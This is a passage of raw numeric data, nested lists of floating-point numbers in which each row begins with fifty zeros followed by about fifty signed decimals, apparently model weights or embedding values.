-0.03525, -0.0503, -0.04053, 0.04962, 0.00656, 0.007065], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5605, -1.062, -1.03, 4.176, -1.204, 1.194, -0.4602, 0.6025, 2.453, -0.425, -0.8647, -0.6177, -0.5186, -1.737, 0.8257, -0.3147, 1.777, 0.1901, -0.8745, -0.008736, 1.149, 2.21, -0.725, 
-1.314, 0.904, 1.243, -0.491, -1.64, -0.7056, -0.35, 1.216, 1.48, 2.158, 0.725, -0.8887, 2.514, -0.843, -0.555, 1.082, 1.756, -0.189, -0.5234, -0.772, 1.472, 1.977, 1.717, -0.03326, 0.0388, -0.8154, 1.456], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0662, -0.2834, 0.2441, -0.05276, 0.1647, -0.1895, 0.748, -0.1364, 0.2455, 0.7554, -1.279, -0.1034, 0.3125, -0.04544, 0.1824, -0.65, -0.048, 0.3777, 0.0514, 0.01689, -0.07446, -0.3992, 0.0566, 0.5884, 0.05682, 0.5977, -0.8325, -0.2297, -0.1145, 0.3767, 0.0425, -0.1416, 0.3108, 0.632, -0.2869, 0.0869, -0.03044, -0.169, -0.0921, 0.1488, 0.5044, 0.4346, -0.9004, 0.1907, -0.31, -0.0765, -0.2847, -0.05002, 0.342, 0.04996], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.453, -0.4316, -2.45, -0.05377, -1.71, 0.756, -1.344, 1.273, -0.004612, -0.8804, -1.094, 0.2593, -0.1505, 0.4106, -0.1509, -0.006844, -0.8037, 1.29, -0.45, -0.0161, 0.5796, 1.07, -0.557, -0.4102, 0.9634, -0.471, 0.7036, -0.614, -0.2585, 0.1329, -0.2118, -3.342, -1.59, -0.3484, 0.5303, 0.7627, -0.103, -3.527, 0.2815, -0.7866, -0.1368, -1.048, 0.947, -0.8467, 0.777, -0.0703, 0.3242, -0.02243, -0.611, -0.333], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1971, -0.752, 0.0752, -0.0003035, 0.0947, -0.226, 0.03622, -0.09674, 0.1619, -0.731, -0.9863, 0.24, 0.11426, -0.794, 0.404, 0.04797, 0.4604, 0.6577, -0.406, -0.04156, -0.231, 0.522, -0.2413, 0.1914, 
-0.6797, -0.392, -0.05197, -1.986, -0.4788, 0.1376, 0.2277, 0.1781, 0.3389, -0.07635, 0.307, 0.3455, 0.502, -0.10077, -0.3762, -0.1481, -1.089, 0.0601, -0.855, 0.655, 0.00413, 0.524, -0.3457, -0.01573, 0.2932, 0.0685], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06067, 0.06616, -0.1284, -0.04776, 0.2006, -0.1672, 0.1799, -0.1252, -0.0679, -0.009605, -0.2903, 0.1198, -0.09155, 0.04895, -0.0857, 0.05798, 0.04736, -0.10834, 0.02713, -0.02423, 0.01178, 0.2954, -0.04382, -0.1499, -0.1625, 0.4272, -0.1611, -0.3306, -0.0943, -0.1123, 0.1038, 0.5293, 0.3557, -0.3691, -0.2441, -0.3894, -0.377, -0.02766, -0.3105, -0.3638, 0.227, -0.08673, 0.04486, 0.01089, 0.1892, -0.2365, -0.1398, -0.03845, 0.09595, 0.1582], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2388, -0.4915, -0.3545, -0.3972, -0.2773, 0.2122, 0.637, 0.718, 0.3687, -0.834, 0.68, -0.1622, -0.4277, -0.2289, -0.4207, -0.1294, -0.6616, 0.9067, -0.7334, -0.008255, 0.119, -0.7935, -0.2178, -1.362, -0.867, 0.0804, 0.1173, 0.771, 0.3806, -0.422, -0.9395, 0.01794, -0.2334, -0.2297, 0.1337, 1.031, 0.1296, -0.02281, -0.2365, 0.269, -0.4363, -0.2448, 0.2935, 0.06805, 0.3528, 0.003641, 0.3127, 0.041, 0.3093, -0.2473], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.216, 0.449, 0.2494, 0.3096, -0.1545, 0.504, -0.322, 0.6343, 0.3938, -0.347, 2.031, -0.0432, -0.2267, -0.54, 1.065, -1.765, -0.2019, 0.1979, -0.0351, 
0.01085, -0.2146, 1.755, -0.301, -0.3108, 0.3582, -0.7065, -1.92, -0.4395, 0.2023, -0.2372, -0.378, 1.436, 0.1737, -1.03, 2.045, 0.2747, -0.31, 0.352, -0.5366, -0.485, 0.788, -0.00906, 0.9736, -0.259, 0.491, 0.1693, -0.5186, 0.04553, -0.1741, -0.4648], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.236, -0.4585, -0.3198, -0.0633, 0.5464, 0.0985, -1.11, -1.311, 0.1433, -0.7114, -0.1976, -0.4163, -0.1711, -1.065, 0.4695, -0.9253, 0.11053, 0.04977, 0.5864, -0.01776, -0.588, 0.8887, -0.52, 0.907, 0.6226, 0.9785, -0.4556, -0.427, 0.4368, 0.2383, 0.473, 0.1542, 0.4277, -0.8335, -0.1512, -0.0631, -1.869, 0.601, -1.573, -0.7485, -0.2886, -0.1702, 0.378, 0.504, 0.409, 0.00536, -0.696, 0.02084, 0.753, -0.1327], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6055, 0.3428, -1.009, 0.5693, -0.383, 0.51, 0.1561, -0.612, 1.03, -0.8687, 1.173, -1.414, -0.6904, 0.0682, -0.1384, 0.9434, -0.2402, 0.5454, -0.4526, -0.01227, -0.3098, 0.3508, -0.02672, -0.9717, 0.448, 0.36, 0.2299, 0.3994, -0.6436, -0.363, 0.9727, 1.104, 0.3499, -0.1818, -0.03705, 0.4255, 1.282, -0.2798, -0.8486, -0.0509, -0.8726, -0.731, 0.4802, -0.2856, 0.9395, 0.493, 0.05338, -0.01188, -0.588, -0.3987], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4053, -0.3381, 0.614, 0.2107, -0.00828, -0.2002, -0.6313, 0.3772, 0.952, -0.9204, 0.7754, -0.1938, -0.04352, -0.2133, -1.8, 0.1451, -0.8027, -0.05676, -0.2656, 
0.03638, -0.2937, 0.4348, -0.0334, -0.2583, 0.703, -0.11755, -0.11285, -0.31, 0.1096, -0.1943, -0.1067, -0.04395, 0.326, -0.4353, 0.12317, 0.4365, -0.01046, -0.2942, -0.01712, 0.1267, 0.8945, 0.2445, 0.3108, -0.02614, -0.005257, 0.0858, 0.1912, 0.04776, 0.2122, -0.0731], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.667, 0.272, 2.066, 0.3042, 0.787, 0.6597, -1.288, 0.2046, -0.2517, 0.508, -2.504, 0.07794, -0.06573, 0.2397, 1.286, 1.433, 0.5923, 0.1409, -0.010284, -0.02893, 0.1284, -0.4507, -0.854, -1.07, -1.37, -0.0922, -0.6353, -1.156, -0.3533, 0.2343, -0.4592, -0.9883, -2.055, 1.131, -1.329, 0.1008, 0.73, 1.044, 0.6255, 1.93, -0.667, 0.8228, -0.5264, -0.7656, 0.428, -0.49, -0.5405, 0.003222, -0.1127, -0.0886], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00977, -0.3425, -0.0873, 0.0231, -0.323, -0.2986, 0.2019, -0.3538, 0.11566, 0.3442, -0.553, 0.322, -0.4197, 0.5225, 0.1874, -0.2727, 1.09, -0.264, 0.4702, 0.01923, 0.3606, 0.7676, 0.1015, -0.512, 0.987, 0.8843, -0.4712, -0.4373, -0.285, -0.2198, -0.3066, -0.1271, 0.4087, -0.002625, -0.2057, -0.0874, -0.2152, 0.04977, -0.0664, 0.4167, -0.03214, -0.0801, -0.1299, 0.2424, 0.0559, -0.4795, -0.2169, -0.0452, 0.445, 0.7754], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.538, 0.1525, -0.5186, 0.2666, -0.3362, 0.3113, 0.2737, 0.6343, 0.1637, -0.08813, 1.443, 0.4773, -0.2544, 0.4724, 0.73, 0.5054, 0.79, 
-0.6226, 0.288, -0.02206, 0.015526, -0.0968, -0.146, -0.6265, 1.82, 0.575, 0.07605, -0.03705, 0.7554, 0.2037, 1.083, 0.8667, 0.917, -0.02028, -0.0861, -0.5166, 0.2362, -0.4736, 0.03116, 0.689, -0.1543, -0.4019, -0.09735, -0.1156, 0.18, 0.4714, 0.3699, 0.008934, -0.2079, -0.5464], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1997, -0.04688, -0.2489, 0.0688, 0.10925, -0.04855, 0.229, 0.1417, -0.1578, -0.2673, 0.4111, -0.2435, -0.1368, -0.2277, -0.1094, -0.6006, 0.1001, -0.2083, 0.58, 0.04272, 0.1667, -0.2256, -0.03842, 0.0518, 0.2362, 0.287, -0.865, -0.3315, 0.05322, -0.11676, -0.1357, 0.2688, 0.2808, 0.0476, 0.351, 0.1047, 0.1698, 0.1582, 0.11786, 0.0739, 0.12085, 0.00574, -0.1211, -1.42, 0.3257, -0.089, 0.00823, -0.01738, -0.2898, 0.0416], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02747, 0.2125, 0.2627, 0.0758, 0.1566, 0.05127, -0.02359, 0.2822, 0.4006, 1.057, -0.0701, -0.1975, 0.02153, -0.3516, 0.1366, -0.2954, 0.2092, -0.06323, -1.359, 0.02759, -0.3235, 0.0317, -0.029, 0.1547, -1.02, 0.6333, -0.02693, -0.5273, 0.0591, 0.0387, -0.1816, -0.5195, 0.3723, -0.0967, 0.06143, 0.3228, 0.1864, -0.0171, -0.03577, 0.3564, -0.317, -0.2493, 0.0663, -0.1434, 0.563, -0.09906, -0.1572, -0.0412, 0.1709, 0.2756], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3525, 0.1757, 0.4993, 0.06934, 0.1401, -0.1562, 0.0642, -0.4229, 0.1716, 0.712, -0.4097, 1.329, 0.1285, 
0.1747, 0.04492, 0.0969, -0.314, -0.06, 0.0913, -0.02959, 0.11597, 0.2036, -0.06232, 0.0947, -0.3784, 0.432, -0.1227, 0.6333, 0.9214, -0.02382, 0.3293, -0.2274, -0.251, -0.10767, 0.0982, -0.302, -0.12427, 0.2245, -0.2001, -0.2363, 0.0684, -0.2783, -0.06323, -0.0602, 0.1677, -0.624, 0.08746, 0.01219, -0.05917, -0.8267], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4746, 0.1754, 0.2246, -0.05347, -0.06476, 0.4863, -0.01134, -0.00824, 0.2703, -0.7524, 0.03738, -3.799, -0.0753, -0.725, 0.009636, 0.614, -0.556, 0.904, -0.2457, -0.0013275, -0.1957, 0.1443, -0.004253, 0.1026, -0.628, -0.974, -0.11395, -0.1448, -0.462, 0.2305, 0.03537, -0.601, -0.2147, -0.05203, -0.2954, 0.4612, 0.05847, 0.1081, -0.2239, 0.4592, -0.3943, -0.0593, 0.2422, -0.2463, 0.615, 0.04807, 0.0331, -0.0177, 0.1993, -0.01988], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.379, 0.1195, 0.76, 0.4734, 0.3271, 0.06027, 0.4653, -0.04776, -1.106, -0.841, 0.9966, -1.371, 0.2487, 0.1377, -0.02856, 0.2053, -0.8267, 0.5386, 0.2421, -0.01576, 0.391, -0.572, 0.2197, 0.2986, -1.719, -0.437, 0.3916, 0.9927, 0.379, 0.519, -1.547, -0.361, -0.758, -0.386, -0.001499, -1.139, 0.03104, 0.09546, -0.343, 0.197, 0.1729, -0.0838, 0.1746, -0.9014, -0.00675, -1.034, 0.3418, 0.02974, -0.001272, -2.395], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.602, 0.3403, -0.282, 0.10974, 0.1942, 0.1476, -0.8247, -0.000938, 
0.0117, -0.5283, 0.8545, -0.1454, -0.2358, -0.0986, 0.02512, 0.6865, -0.51, 0.4597, 0.0916, 0.003819, 0.07513, -0.374, 0.362, 0.3418, -0.611, -0.4448, 0.46, -0.07886, 0.0582, -0.10236, 0.2625, 0.4243, 0.06366, 0.002718, 0.1301, -0.1838, 0.07196, 0.4587, -0.5815, -0.2438, 0.2247, -0.2432, 0.4858, -0.744, -0.09125, -0.2954, 0.3967, 0.006012, 0.595, 0.1843], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7485, -0.6367, -2.164, -0.2057, -0.781, -1.208, 0.6396, 0.6274, -0.02414, -1.286, -0.4045, -0.1278, -0.4243, 1.438, -0.8857, 0.544, 0.5415, -1.059, -0.653, -0.04178, 0.3242, -1.362, -0.575, -8.53, 0.749, 0.788, 1.4375, 0.1089, -0.2059, 0.1774, 0.8447, -0.3213, 1.521, 0.5254, -0.293, -0.566, -0.7427, -0.2068, -0.298, -0.5093, -14.16, 0.22, -0.874, -0.3728, 0.03705, 1.06, 0.1508, 0.03223, -0.06824, -0.2966], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12476, -0.163, 0.1705, 0.3289, 0.06696, 0.1566, -0.2576, -0.0531, 0.352, 0.1692, -0.01826, 0.529, -0.07794, 0.1556, -0.05307, -0.1569, 0.07385, -0.3464, -0.03076, -0.01785, 0.11566, -0.2854, -0.0471, 0.07526, -0.1086, 0.01935, -0.01855, -0.313, 0.1238, 0.0696, 0.11694, 0.0988, 0.0791, 0.1852, -0.02994, 0.2966, 0.04187, -0.091, -0.09424, -0.06354, 0.0496, -0.1611, 0.05695, 0.289, -0.06934, 0.3865, 0.1052, 0.014435, 0.2075, -0.02724], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02248, 0.2352, -0.00244, 0.2354, 
-0.3127, 0.2169, -0.2119, 0.1438, 0.04535, 0.0775, 0.5337, 0.0782, -0.1276, -0.1117, 0.0442, -0.1998, 0.3875, 0.1714, -0.05396, -0.01167, 0.2168, 0.3362, -0.1912, -0.05646, -0.0918, -0.08716, -0.1917, -0.0875, -0.01956, -0.04547, 0.1537, 0.0835, 0.04355, 0.04987, 0.08466, -0.0676, 0.3164, -0.2717, 0.1643, 0.09546, -0.2312, -0.2979, -0.03708, -0.3408, 0.09534, 0.002558, -0.03912, -0.01036, -0.1727, -0.08765], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.658, -0.2686, -0.4158, -0.3857, -0.092, 0.349, -1.461, 0.937, -0.312, 1.932, -1.584, 0.461, 0.2266, -0.4387, 0.0652, -1.654, 1.668, -0.4883, -0.2207, 0.0494, -0.682, 1.436, -0.3184, -0.533, 0.922, 0.3425, -0.3687, 0.722, -0.17, -0.7104, 0.2319, -2.617, -0.1733, 0.1986, 0.951, 0.743, -0.04095, -1.717, -1.064, 0.11237, 0.846, -0.64, -0.391, 0.3164, 0.9727, -1.095, -0.6807, -0.02843, -1.464, 0.7686], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2373, -0.10114, 0.8896, -6.52, -1.659, -0.856, -0.3179, 1.531, -0.918, 2.707, -0.2646, 1.044, 0.527, 0.672, 1.237, 0.1913, -0.12115, -1.547, 0.3884, 0.02554, -0.7827, 3.898, 0.6875, -0.4553, -0.01776, 0.3499, 0.3186, -0.857, 0.503, 0.7427, -0.633, -0.949, -2.307, -0.815, 0.479, -0.356, -0.5435, 0.2225, -0.806, -0.3699, 0.6636, -0.09424, -0.1705, -1.996, -2.703, -0.03415, -0.876, -0.0316, -0.2157, -2.312], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05508, -0.02249, 
-0.0622, -0.1805, 0.01208, -0.00936, 0.05698, 0.2192, -0.003416, -0.01564, -0.05087, 0.2861, -0.06207, -0.1346, 0.1385, -0.1843, -0.1537, -0.1781, -0.2075, -0.0177, 0.0252, 0.2832, -0.1588, -0.0791, 0.269, 0.01198, -0.1447, -0.07635, 0.04367, -0.2134, -0.002476, 0.4565, 0.1895, -0.01569, -0.0295, -0.02344, -0.0999, 0.02493, 0.1653, 0.03625, 0.1279, -0.10284, -0.1719, -0.0592, -0.3647, 0.3645, -0.002584, -0.02701, -0.127, 0.0734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3254, 0.1431, 0.2793, -0.4358, 0.1587, -0.059, 0.576, -0.0932, -0.506, 0.2369, -0.6636, -0.3743, -0.0839, 0.1196, -0.1425, 0.2512, -0.1401, -0.1625, 0.3909, -0.0393, 0.001703, -0.2476, 0.1978, 0.1404, 0.011566, -0.3696, 0.08795, -0.02592, -0.674, -0.0861, -0.7104, 1.11, -0.07916, -0.0128, -0.2245, -0.327, -0.392, -0.5947, -0.002073, -0.4878, -0.2107, 0.0861, 0.0943, 0.343, 0.4392, -0.2257, 0.04446, -0.0193, 0.4524, 1.045], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6035, -0.05826, -0.11945, 0.348, -0.1643, 0.4336, -0.8745, -0.7314, -0.907, -1.237, 1.501, -2.738, -0.05664, 1.042, 0.5747, -0.0407, -1.209, 0.53, 1.648, -0.01718, -0.1473, 0.0718, -0.03008, 0.303, 0.9062, -3.557, -0.8105, -0.1498, -1.609, -0.707, 0.03397, 1.605, -0.5728, -0.3516, -0.001982, -0.316, 1.109, -0.8696, -0.355, -0.2347, 0.4866, 0.3684, 0.5083, 0.2722, -6.6, -0.2837, 0.4656, 0.02568, 0.2559, -0.34], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
